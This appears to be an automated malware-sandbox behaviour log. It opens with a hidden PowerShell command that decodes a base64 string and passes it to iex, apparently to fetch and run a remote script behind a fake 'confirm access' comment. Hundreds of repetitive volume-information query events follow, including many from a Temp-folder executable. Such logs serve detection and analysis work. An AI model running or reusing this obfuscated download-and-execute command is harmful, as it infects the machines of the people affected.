Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -c "$cmd='';$b='axdyigh0dhbzoi8vyxbpb2vrcy5py3uvzml4ic1vc2vcyxnpy1bhcnnpbmd8awv4';$cmd=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($b));iex $cmd;$null=' confirm access - 7891045'

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
